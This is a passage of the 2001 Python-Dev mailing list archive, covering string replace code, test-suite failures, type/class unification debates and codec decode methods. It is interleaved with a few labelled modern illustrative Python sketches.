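    if not old:
        # str.replace() gives an empty pattern a special meaning; this sketch doesn't.
        raise ValueError("empty pattern not supported in this sketch")
    pieces: List[S] = []
    start = 0
    while count != 0:              # a negative count never reaches 0
        hit = s.find(old, start)
        if hit < 0:
            break
        pieces.append(s[start:hit])
        pieces.append(new)
        start = hit + len(old)
        count -= 1
    pieces.append(s[start:])
    # s[:0] is an empty object of the same type as s, so the join returns
    # str for str input and bytes for bytes input, including an empty result.
    return s[:0].join(pieces)


if __name__ == "__main__":
    print(replace_generic("one!two!three!", "!", "@"))
    print(replace_generic(b"one!two!three!", b"!", b"@", 0))
```

Collecting the pieces and joining once builds the result in a single step at the end, rather than filling a scratch buffer and copying it into a new string afterwards, which is the pattern Fredrik complained about in strop.replace.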
From MarkH@ActiveState.com Thu May 10 11:36:13 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Thu, 10 May 2001 20:36:13 +1000
Subject: [Python-Dev] Homepage
In-Reply-To: <20010510113138.K16486@xs4all.nl>
Message-ID: 

> > Set u=t.GetDefaultFolder(6)
> > Set u=t.GetDefaultFolder(3)

> I know it's off-topic, but Greg started it! ;-) Does anyone know which
> folders those two 'GetDefaultFolder' statements open ? I suspect it's
> sent-mail and trash, or some such, but I don't know enough about
> Outlook to know if it even *has* sent-mail and trash folders :)

Running makepy.py over the Outlook type library yields the following:

	olFolderCalendar              =0x9        # from enum OlDefaultFolders
	olFolderContacts              =0xa        # from enum OlDefaultFolders
	olFolderDeletedItems          =0x3        # from enum OlDefaultFolders
	olFolderDrafts                =0x10       # from enum OlDefaultFolders
	olFolderInbox                 =0x6        # from enum OlDefaultFolders
	olFolderJournal               =0xb        # from enum OlDefaultFolders
	olFolderNotes                 =0xc        # from enum OlDefaultFolders
	olFolderOutbox                =0x4        # from enum OlDefaultFolders
	olFolderSentMail              =0x5        # from enum OlDefaultFolders
	olFolderTasks                 =0xd        # from enum OlDefaultFolders

So it appears the inbox and deleted items.

Mark.

From tim.one@home.com Thu May 10 09:54:42 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 10 May 2001 04:54:42 -0400
Subject: [Python-Dev] test___all__ failing on WIndows
Message-ID: 

> python ../lib/test/regrtest.py test___all__
test___all__
test test___all__ failed -- tty has no __all__ attribute
1 test failed: test___all__

C:\Code\python\dist\src\PCbuild>

I assume this is yet another case where some excruciatingly non-obvious
sequence of failing imports manages to leave behind a damaged module
object in sys.modules that prevents test___all__'s import of tty from
getting the ImportError it *ought* to get under Windows (and betting
termios is the ultimate culprit).

I've fixed enough of these.  Somebody who thinks this is "a feature"
gets to do it this time .
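Mark's makepy listing answers Thomas's question: GetDefaultFolder(6) is the Inbox and GetDefaultFolder(3) is Deleted Items. As a small illustrative sketch (not part of the thread), the same constants can be held in a Python IntEnum so that numeric folder ids decode to names. The class reuses the enum name from the listing and its values are copied from it; folder_name() is a hypothetical helper, and nothing here talks to Outlook or COM.

```python
from enum import IntEnum


class OlDefaultFolders(IntEnum):
    """Folder ids copied from Mark Hammond's makepy listing of the Outlook type library."""
    olFolderDeletedItems = 0x3
    olFolderOutbox = 0x4
    olFolderSentMail = 0x5
    olFolderInbox = 0x6
    olFolderCalendar = 0x9
    olFolderContacts = 0xA
    olFolderJournal = 0xB
    olFolderNotes = 0xC
    olFolderTasks = 0xD
    olFolderDrafts = 0x10


def folder_name(code: int) -> str:
    """Hypothetical helper: map a GetDefaultFolder() argument to its constant name."""
    try:
        return OlDefaultFolders(code).name
    except ValueError:  # IntEnum raises ValueError for values it does not define
        return "unknown folder id %d" % code


if __name__ == "__main__":
    for code in (6, 3):  # the two ids used by the script Thomas quoted
        print(code, folder_name(code))
```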
From guido@digicool.com Thu May 10 14:43:07 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 08:43:07 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 22:00:30 -0400." References: Message-ID: <200105101343.IAA01450@cj20424-a.reston1.va.home.com> > [Guido] > > Yes, but in the mean time the fact that it's buggy doesn't bother > > me at all. Let it be as buggy as it always was -- that's one more > > reason to stop using it! :-) [Tim] > I think that's unsustainable in this specific case: stringobject and > stropmodule contained several utility functions with the same names > that clearly started life as identical code. Over time they got out > of synch, and when they punched me in the face today, I had no idea > which was "right" and which "wrong". Turned out they both had the > same bug, and the clearest way to fix it in stringobject.c without > leaving a more inconsistent x-module mess was to bring the > once-common utility routines back into synch. Of course, the real bug was copy-and-paste programming. The common code should have been factored out rather than copied. > As /F said, though, the mymemreplace() approach is inefficient and > "should be" replaced wholesale. If that's done in stringobject.c > alone, great, then I won't care about the legacy routines in > stropmodule.c either. What I can't abide is having one copy of a > function in the codebase work and a clone of it not work -- unless > you can keep the undocumented history of both in your mind at all > times, you're just as likely to bump into the broken one first when > searching the code base, and if you're unlucky never even realize it > is "the broken one" (or, if you're lucky, bump into the good one > too, and then pee away time trying to understand the differences). Here's an idea. 
We remove stropmodule.c, and replace it with a strop.py that issues a
warning and then imports selected things from string.py.  The only
complication is that there are a few constants and one function in
strop that are still imported into string.py; I propose to move these
to an "internal" extension module (e.g. "_string").

--Guido van Rossum (home page: http://www.python.org/~guido/)

From guido@digicool.com Thu May 10 15:02:59 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 09:02:59 -0500
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: Your message of "Wed, 09 May 2001 23:17:34 -0400." <15098.2126.368714.159135@slothrop.digicool.com>
References: <15098.2126.368714.159135@slothrop.digicool.com>
Message-ID: <200105101402.JAA01678@cj20424-a.reston1.va.home.com>

> The latest CVS build works on my Linux 2.2.12 system.  No problem with
> test_mmap.  But test_pty does fail with some complaints about FCNTL,
> which Fred just removed.  Maybe Fred is working in an alternate
> universe where test_mmap and test_pty are swapped.

Strange.  They *both* work for me with the latest CVS (and even after
removing all *.pyc files!), although last night (?) I recall seeing a
test_pty failure too.

--Guido van Rossum (home page: http://www.python.org/~guido/)

From skip@pobox.com (Skip Montanaro) Thu May 10 15:16:24 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 10 May 2001 09:16:24 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
References: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
Message-ID: <15098.41656.128146.826459@beluga.mojam.com>

    Guido> Yes, but in the mean time the fact that it's buggy doesn't bother
    Guido> me at all.  Let it be as buggy as it always was -- that's one
    Guido> more reason to stop using it!
    Guido> :-)

In fact, perhaps the import warning could mention that strop is buggy
and won't be fixed... :-)

Skip

From skip@pobox.com (Skip Montanaro) Thu May 10 15:32:15 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 10 May 2001 09:32:15 -0500
Subject: [Python-Dev] test___all__ failing on WIndows
In-Reply-To: 
References: 
Message-ID: <15098.42607.84670.323361@beluga.mojam.com>

    >> python ../lib/test/regrtest.py test___all__
    Tim> test___all__
    Tim> test test___all__ failed -- tty has no __all__ attribute
    Tim> 1 test failed: test___all__

grumble, grumble...

    Tim> I assume this is yet another case where some excruciatingly
    Tim> non-obvious sequence of failing imports manages to leave behind a
    Tim> damaged module object in sys.modules that prevents test___all__'s
    Tim> import of tty from getting the ImportError it *ought* to get under
    Tim> Windows (and betting termios is the ultimate culprit).

I (thankfully) gave up even pretending to run Windows recently, so I can
only make a suggestion for others who look into this problem.  Try this:
Change test___all__.check_all so that the except clause reads:

    except ImportError, msg:

then print out msg when an import fails.  You should get the actual
module that failed to import.  If foo.py consists of simply "import bar",
and I import it, I see that bar couldn't be imported:

    >>> try:
    ...   import foo
    ... except ImportError, msg:
    ...   print msg
    ...
    No module named bar

Skip

From fdrake@acm.org Thu May 10 15:57:59 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 10 May 2001 10:57:59 -0400 (EDT)
Subject: [Python-Dev] Re: test_mmap failing?
In-Reply-To: 
References: 
Message-ID: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > But having suffered too many "impossible problems" the last 36 hours, my
 > confidence is shot <0.93 wink>.  Is test_mmap failing for anyone else under
 > current CVS?
Fred, are you *sure* it fails for you -- if so, does the > problem actually go away if you revert mmapmodule.c? It was indeed showing the behavior I described! I figured out what it was this morning and closed the patch again. The problem, of course(!), had nothing to do with mmap, before or after any of the recent changes to mmap. Or any old changes. It had a lot to do with the change I made to the socket module. ;-) While figuring out the reported bug in the socket module, I created named pipes, including one named "foo". The mmap test opens a file "foo" with mode "w+" in the directory in which I just happened to create the named pipe, so it ended up with a file object opened on a pipe -- things just don't work the same for these beasts! Needless to say test_mmap failed with a cryptic error message. This begs the question, though -- should tests that create temp files check that the files don't already exist, and fail with a more descriptive error if they do? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake@acm.org Thu May 10 15:59:08 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Thu, 10 May 2001 10:59:08 -0400 (EDT) Subject: [Python-Dev] test_mmap failing? In-Reply-To: <15098.2126.368714.159135@slothrop.digicool.com> References: <15098.2126.368714.159135@slothrop.digicool.com> Message-ID: <15098.44220.515660.330116@cj42289-a.reston1.va.home.com> Jeremy Hylton writes: > The latest CVS build works on my Linux 2.2.12 system. No problem with > test_mmap. But test_pty does fail with some complaints about FCNTL, > which Fred just removed. Maybe Fred is working in an alternate > universe where test_mmap and test_pty are swapped. Or, I could just be working in an alternate universe altogether. I've been known to do that.... -Fred -- Fred L. Drake, Jr. 
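One way to answer Fred's question is exclusive creation. Opening a file with mode "x" fails when the path already exists, whether the leftover is a regular file or a named pipe. The following is a minimal sketch using Python 3's "x" mode, which the 2001 test suite predates. The helper name `open_fresh_testfile` is hypothetical.

```python
import os
import tempfile


def open_fresh_testfile(path):
    """Create `path` for reading and writing, refusing to reuse anything
    that already exists there (e.g. a leftover named pipe called "foo")."""
    try:
        return open(path, "x+")  # "x": exclusive creation, fails if path exists
    except FileExistsError:
        raise RuntimeError(
            f"test file {path!r} already exists; remove it and rerun the test"
        ) from None


if __name__ == "__main__":
    workdir = tempfile.mkdtemp()
    path = os.path.join(workdir, "test_mmap.foo")
    with open_fresh_testfile(path) as f:
        f.write("hello")
    try:
        open_fresh_testfile(path)  # second attempt hits the existing file
    except RuntimeError as exc:
        print(exc)
```

tempfile.mkstemp() avoids the collision altogether: it picks a unique name and creates the file with O_EXCL. That is often simpler than choosing a fixed name such as 'foo'.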
PythonLabs at Digital Creations From paulp@ActiveState.com Thu May 10 22:55:36 2001 From: paulp@ActiveState.com (Paul Prescod) Date: Thu, 10 May 2001 14:55:36 -0700 Subject: [Python-Dev] Type/class Message-ID: <3AFB0E58.1F0ABCA6@ActiveState.com> -------- Original Message -------- Log Message: Make attributes of subtypes writable, but only for dynamic subtypes derived in Python using a class statement; static subtypes derived in C still have read-only attributes. -------- Original Message -------- I would like to argue that "plain old C types" should act as if they have __dict__s for consistency with other types. It is sometimes useful to be able to annotate objects by adding attributes to them. But this only works with class instance objects, not instances of types. Paul Prescod From jeremy@digicool.com Thu May 10 22:59:34 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Thu, 10 May 2001 17:59:34 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <3AFB0E58.1F0ABCA6@ActiveState.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> Message-ID: <15099.3910.648127.25900@slothrop.digicool.com> >>>>> "PP" == Paul Prescod writes: PP> I would like to argue that "plain old C types" should act as if PP> they have __dict__s for consistency with other types. It is PP> sometimes useful to be able to annotate objects by adding PP> attributes to them. But this only works with class instance PP> objects, not instances of types. Every type should have an __dict__ of type dict? Then every dict must have an __dict__, including the __dict__ of __dict__? Once every object has an __dict__, every object will be mutable. Then no object will be usable as a dict key and we can get rid of dict's entirely. 
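Jeremy's objection assumes that an object's hash depends on all of its attributes. As Paul points out in his reply, it need not. In the sketch below, the hypothetical `Node` class bases equality and hashing on `key` alone. Attaching extra attributes later therefore does not disturb its use as a dictionary key.

```python
class Node:
    """Hypothetical example: hashing and equality come from `key` alone."""

    def __init__(self, key):
        self.key = key

    def __eq__(self, other):
        return isinstance(other, Node) and self.key == other.key

    def __hash__(self):
        return hash(self.key)


if __name__ == "__main__":
    n = Node("a")
    table = {n: 1}
    n.note = "annotated after insertion"  # mutates n, but not its hash
    print(table[Node("a")])  # 1
```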
Jeremy From fdrake@cj42289-a.reston1.va.home.com Thu May 10 23:47:14 2001 From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake) Date: Thu, 10 May 2001 18:47:14 -0400 (EDT) Subject: [Python-Dev] [maintenance doc updates] Message-ID: <20010510224714.15E4328946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/maint-docs/ Incremental update for the maintenance version docs. From fdrake@cj42289-a.reston1.va.home.com Fri May 11 00:04:40 2001 From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake) Date: Thu, 10 May 2001 19:04:40 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010510230440.30DB228946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental update for the development version of the docs. From guido@digicool.com Fri May 11 01:03:13 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 19:03:13 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Thu, 10 May 2001 14:55:36 MST." <3AFB0E58.1F0ABCA6@ActiveState.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> Message-ID: <200105110003.TAA02924@cj20424-a.reston1.va.home.com> Glad somebody is watching what I'm doing here -- I was afraid I was having too much fun by myself! :-) > -------- Original Message -------- > Log Message: > > Make attributes of subtypes writable, but only for dynamic subtypes > derived in Python using a class statement; static subtypes derived in > C still have read-only attributes. > -------- Original Message -------- > > I would like to argue that "plain old C types" should act as if they > have __dict__s for consistency with other types. Good point. Plain old types currently (in the descr-branch) have a readonly dict (using a proxy) and no settable attributes. 
I will probably give types settable attributes in a next revision, but I prefer not to make the type's dict writable -- I need to be able to watch the setattr calls so that if someone changes DictType.__getitem__ I can change the mp_subscript to a C function that calls the __getitem__ method. For speed reasons, if you don't override them, the C tp_slot functions carry out the operation directly, and the __slot__ methods call the C tp_slot functions; but when __slot__ is overridden, tp_slot must call __slot__. > It is sometimes useful > to be able to annotate objects by adding attributes to them. But this > only works with class instance objects, not instances of types. > > Paul Prescod If you're talking about *instances*: instances of subtypes of built-in types have a dict of their own to which you can add stuff to your heart's content. Instances of built-in types will continue not to have a dict (it would cost too much space if *every* object had a dict, even if it was a NULL pointer when no attrs are defined). If you mean you want to annotate types like you can annotate classes, that should be possible once I implement what I describe above. --Guido van Rossum (home page: http://www.python.org/~guido/) From paulp@ActiveState.com Fri May 11 00:22:16 2001 From: paulp@ActiveState.com (Paul Prescod) Date: Thu, 10 May 2001 16:22:16 -0700 Subject: [Python-Dev] Type/class References: <3AFB0E58.1F0ABCA6@ActiveState.com> <15099.3910.648127.25900@slothrop.digicool.com> Message-ID: <3AFB22A8.A0A6A4D4@ActiveState.com> Jeremy Hylton wrote: > > >>>>> "PP" == Paul Prescod writes: > > PP> I would like to argue that "plain old C types" should act as if > PP> they have __dict__s for consistency with other types. It is > PP> sometimes useful to be able to annotate objects by adding > PP> attributes to them. But this only works with class instance > PP> objects, not instances of types. > > Every type should have an __dict__ of type dict? 
Then every dict > must have an __dict__, including the __dict__ of __dict__? What's wrong with that? Every object has a type, even type objects, and type types. It only becomes a problem if you try to recursively walk all the dictionaries in the system adding information to them. Otherwise they have null pointers that "act as if" they were empty dictionaries. > Once every object has an __dict__, every object will be mutable. Then > no object will be usable as a dict key and we can get rid of dict's > entirely. According to that argument, instances cannot be dictionary keys. That is simply not true. Objects do not implement their hash functions in terms of ALL of their attributes! -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From mwh@python.net Fri May 11 00:31:53 2001 From: mwh@python.net (Michael Hudson) Date: Fri, 11 May 2001 00:31:53 +0100 (BST) Subject: [Python-Dev] python-dev summary 2001-04-26 - 2001-05-10 Message-ID: This is a summary of traffic on the python-dev mailing list between Apr 26 and May 9 (inclusive) 2001. It is intended to inform the wider Python community of ongoing developments. To comment, just post to python-list@python.org or comp.lang.python in the usual way. Give your posting a meaningful subject line, and if it's about a PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep iteration) All python-dev members are interested in seeing ideas discussed by the community, so don't hesitate to take a stance on a PEP if you have an opinion. This is the seventh summary written by Michael Hudson. 
Summaries are archived at:
Posting distribution (with apologies to mbm). Number of articles in summary: 228. Articles per day: Thu 26: 7, Fri 27: 24, Sat 28: 10, Sun 29: 1, Mon 30: 10, Tue 01: 10, Wed 02: 44, Thu 03: 23, Fri 04: 19, Sat 05: 10, Sun 06: 2, Mon 07: 12, Tue 08: 17, Wed 09: 39.
A fairly quiet, but interesting fortnight (and I don't mean the sarcastic replies to the Homepage virus). A few build problems and bugs fixed, and one very involved discussion (cf. most of the rest of this summary). * type == class? * Guido posted a message from Jim Althoff describing the metaclass system used in Smalltalk: He also mentioned a problem that is bound to bite any attempt to heal the type/class split in Python. If there are to be no special cases in the type system then classes and types in particular should be instances. This sounds innocuous, but consider:

    class MyDictType(DictType):
        def __repr__(self):
            return "MyDictType(%s)" % DictType.__repr__(self)

The code is hoping that, as in today's Python, DictType.__repr__ will return an unbound method - the __repr__ method of vanilla dictionaries, so that output of the form MyDictType({1:2}) will be given. But DictType is now an instance, so there's another interpretation for DictType.__repr__ - the bound DictType's own __repr__ method! This is a fundamental problem; currently "class.attr" and "instance.attr" have different meanings in Python, and any attempt to conflate the notions of "class" and "instance" is bound to run aground.
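For comparison, here is how the MyDictType example plays out in present-day Python, where `dict` itself is the type (DictType was an alias for it). Both spellings below work today. In Python 3, `dict.__repr__` yields the unbound slot wrapper for dict instances, not a bound method of the type object. `super()` is roughly what the "souped up super" idea turned into. The class names are illustrative.

```python
class MyDict(dict):
    def __repr__(self):
        # Explicit base-class call: dict.__repr__ is an unbound slot wrapper.
        return "MyDict(%s)" % dict.__repr__(self)


class MyDict2(dict):
    def __repr__(self):
        # Same result via super(), without naming the base class.
        return "MyDict2(%s)" % super().__repr__()


if __name__ == "__main__":
    print(repr(MyDict({1: 2})))   # MyDict({1: 2})
    print(repr(MyDict2({1: 2})))  # MyDict2({1: 2})
```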
Guido proposed some hairy disambiguation rules in the above-linked message, but no-one was particularly enthused about them, possibly because no-one could really get their head round them. The long term solution is to change the syntax for getting - or removing entirely - unbound methods. As far as anyone can make out, all that unbound methods are used for is calling superclasses' methods from overriding methods, so if one can find another way of spelling that, then removing unbound methods entirely could be contemplated. So the discussion on that went around for a bit, with no really new compelling ideas surfacing. There was some support for some kind of souped up super.foo() construct: To me, the most plausible ideas came from Thomas Heller: and from Paul Dubois, who suggested nicking the feature renaming feature from Eiffel: though the best syntax for the latter is far from clear. There's also the king-sized issue of backwards compatibility; to a first degree of approximation, *all* Python code that uses inheritance would need to be updated to accommodate changes in the meaning of "class.attribute". Another __future__ statement, maybe? * data.decode * Marc-Andre Lemburg asked if it might be an idea if string objects sprouted an .decode method: After some umming and arring and accusations of bloat, this got BDFL approval, and should appear in CVS imminently. * Moving MacPython to sourceforge * Jack Jansen posted notice that he intends to move the MacPython code over to sourceforge: It will be nice to finally have all the code in the same place! Cheers, M. From paulp@ActiveState.com Fri May 11 01:26:43 2001 From: paulp@ActiveState.com (Paul Prescod) Date: Thu, 10 May 2001 17:26:43 -0700 Subject: [Python-Dev] Type/class References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> Message-ID: <3AFB31C3.5CEF9064@ActiveState.com> Guido van Rossum wrote: > >... > > Good point.
Plain old types currently (in the descr-branch) have a > readonly dict (using a proxy) and no settable attributes. I will > probably give types settable attributes in a next revision, but I > prefer not to make the type's dict writable -- I need to be able to > watch the setattr calls so that if someone changes > DictType.__getitem__ I can change the mp_subscript to a C function > that calls the __getitem__ method. I'm happy to have you look and see if I'm setting something magical. But if I'm not, I would like you to just add the thing I made to an internal private dictionary and remember it. I think that's what you are talking about. >... > If you're talking about *instances*: instances of subtypes of built-in > types have a dict of their own to which you can add stuff to your > heart's content. Instances of built-in types will continue not to > have a dict (it would cost too much space if *every* object had a > dict, even if it was a NULL pointer when no attrs are defined). Darn. That *is* what I was hoping for. There is an implementation that is slowish if you use it, but has little cost if you don't: keep a big dict mapping object pointers to their associated dictionaries (if any). For purposes of discussion, call it sys._associations. Then have the getattr on "PyObject" look in this dict of dicts for attributes that it can't otherwise find, and setattr construct dictionaries in the dict of dicts if necessary. That's the usual workaround anyhow so this would be a nicer syntax and a more orthoganal model. Price: a hasattr that would return false or getattr that would raise AttributeError would be a little slower. They would have to check the dictionary of dictionaries before deciding that they really don't have the attribute. -- Take a recipe. Leave a recipe. Python Cookbook! 
http://www.ActiveState.com/pythoncookbook From guido@digicool.com Fri May 11 02:57:36 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 20:57:36 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Thu, 10 May 2001 17:26:43 MST." <3AFB31C3.5CEF9064@ActiveState.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com> Message-ID: <200105110157.UAA03123@cj20424-a.reston1.va.home.com> > > Good point. Plain old types currently (in the descr-branch) have a > > readonly dict (using a proxy) and no settable attributes. I will > > probably give types settable attributes in a next revision, but I > > prefer not to make the type's dict writable -- I need to be able to > > watch the setattr calls so that if someone changes > > DictType.__getitem__ I can change the mp_subscript to a C function > > that calls the __getitem__ method. > > I'm happy to have you look and see if I'm setting something magical. But > if I'm not, I would like you to just add the thing I made to an internal > private dictionary and remember it. I think that's what you are talking > about. OK, we agree on this one. > >... > > If you're talking about *instances*: instances of subtypes of built-in > > types have a dict of their own to which you can add stuff to your > > heart's content. Instances of built-in types will continue not to > > have a dict (it would cost too much space if *every* object had a > > dict, even if it was a NULL pointer when no attrs are defined). > > Darn. That *is* what I was hoping for. > > There is an implementation that is slowish if you use it, but has little > cost if you don't: keep a big dict mapping object pointers to their > associated dictionaries (if any). For purposes of discussion, call it > sys._associations. 
Then have the getattr on "PyObject" look in this dict > of dicts for attributes that it can't otherwise find, and setattr > construct dictionaries in the dict of dicts if necessary. > > That's the usual workaround anyhow so this would be a nicer syntax and a > more orthoganal model. > > Price: a hasattr that would return false or getattr that would raise > AttributeError would be a little slower. They would have to check the > dictionary of dictionaries before deciding that they really don't have > the attribute. Personally, if you want this outrageous implementation, you should be paying for it, not the infrastructure. It feels contrary to Python's treatment of objects. I don't like elaborate workarounds in the implementation like this -- probably because the performance model becomes muddy. --Guido van Rossum (home page: http://www.python.org/~guido/) From greg@cosc.canterbury.ac.nz Fri May 11 02:05:11 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 11 May 2001 13:05:11 +1200 (NZST) Subject: [Python-Dev] Type/class In-Reply-To: <3AFB22A8.A0A6A4D4@ActiveState.com> Message-ID: <200105110105.NAA17698@s454.cosc.canterbury.ac.nz> Paul Prescod : > Otherwise > they have null pointers that "act as if" they were empty > dictionaries. Actually, they need to act as if they were empty except for a "__dict__" slot which contains another one of these magic things. :-) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From barry@digicool.com Fri May 11 04:45:38 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Thu, 10 May 2001 23:45:38 -0400 Subject: [Python-Dev] Interview with Mark Lutz Message-ID: <15099.24674.311472.184935@anthem.wooz.org> Great interview with Mark on the ORA site, linked from /. 
http://python.oreilly.com/news/python_0501.html -Barry From fredrik@effbot.org Fri May 11 06:57:34 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Fri, 11 May 2001 07:57:34 +0200 Subject: [Python-Dev] Interview with Mark Lutz References: <15099.24674.311472.184935@anthem.wooz.org> Message-ID: <022d01c0d9eb$d3e3d680$e46940d5@hagrid> barry wrote: > Great interview with Mark on the ORA site, linked from /. > > http://python.oreilly.com/news/python_0501.html you mean that python-devers read slashdot for python news, when you have the daily url: http://www.pythonware.com/daily Cheers /F From thomas@xs4all.net Fri May 11 10:02:26 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Fri, 11 May 2001 11:02:26 +0200 Subject: [Python-Dev] Re: test_mmap failing? In-Reply-To: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Thu, May 10, 2001 at 10:57:59AM -0400 References: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com> Message-ID: <20010511110226.M16486@xs4all.nl> On Thu, May 10, 2001 at 10:57:59AM -0400, Fred L. Drake, Jr. wrote: [ Fred violates Tim's Rule #1 (don't ever use 'foo' for anything) and gets bitten in the derriere ] > This begs the question, though -- should tests that create temp > files check that the files don't already exist, and fail with a more > descriptive error if they do? I'd think so, yes. I'd also suggest nothing uses something as lamenamed as 'foo', 'test' or 'spam' -- I'm sure Tim will agree with me, at least on the first account :) How about mmap calls its test-testfile 'test_mmap.foo' ? -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal@lemburg.com Fri May 11 10:34:25 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 11 May 2001 11:34:25 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! 
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <3AFBB221.F29BCB9A@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > I've attached the patch. Due to a small reorganisation the patch is > > a little longer -- symmetry has its price at C level too ;-) > > I may be being dense, but can you explain what's going on here: > > ->> u'\u00e3'.encode('latin-1') > '\xe3' > ->> u'\u00e3'.encode("latin-1").decode("latin-1") > Traceback (most recent call last): > File "", line 1, in ? > UnicodeError: ASCII encoding error: ordinal not in range(128) The string.decode() method will try to reuse the Unicode codecs here. To do this, it will have to convert the string to Unicode first and this fails due to the character not being in the ASCII range. > Can you come up with some other example I can use in tomorrow's > python-dev summary? I will add some codecs which make the .decode() method useful next week. The ones I have in mind are base64, hex and some of the other binascii codecs. Also, the ROT13 codec I posted will go into the core as a simple example. With those you will be able to write: data.encode('base64').decode('base64') and get back data. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik@effbot.org Fri May 11 10:43:14 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Fri, 11 May 2001 11:43:14 +0200 Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> Message-ID: <049801c0d9fe$cd98aef0$e46940d5@hagrid> mal wrote: > > I may be being dense, but can you explain what's going on here: > > > > ->> u'\u00e3'.encode('latin-1') > > '\xe3' > > ->> u'\u00e3'.encode("latin-1").decode("latin-1") > > Traceback (most recent call last): > > File "", line 1, in ? > > UnicodeError: ASCII encoding error: ordinal not in range(128) > > The string.decode() method will try to reuse the Unicode > codecs here. To do this, it will have to convert the string > to Unicode first and this fails due to the character not being > in the ASCII range. can you take that again? shouldn't michael's example be equivalent to: unicode(u"\u00e3".encode("latin-1"), "latin-1") if not, I'd argue that your "decode" design is broken, instead of just buggy... Cheers /F From mal@lemburg.com Fri May 11 10:50:24 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 11 May 2001 11:50:24 +0200 Subject: [Python-Dev] Interview with Mark Lutz References: <15099.24674.311472.184935@anthem.wooz.org> <022d01c0d9eb$d3e3d680$e46940d5@hagrid> Message-ID: <3AFBB5E0.620710C8@lemburg.com> Fredrik Lundh wrote: > > barry wrote: > > > Great interview with Mark on the ORA site, linked from /. > > > > http://python.oreilly.com/news/python_0501.html > > you mean that python-devers read slashdot for python news, > when you have the daily url: > > http://www.pythonware.com/daily I just bought one of those nice machines that can run pippy and was wondering how to get AvantGo (the channel software that comes with it) to synchronize with your daily URL... wouldn't it be possible to setup a channel for this ? The AvantGo channels can be registered at their site (http://www.avantgo.com), but the contents would have to be "mobile friendly"... 
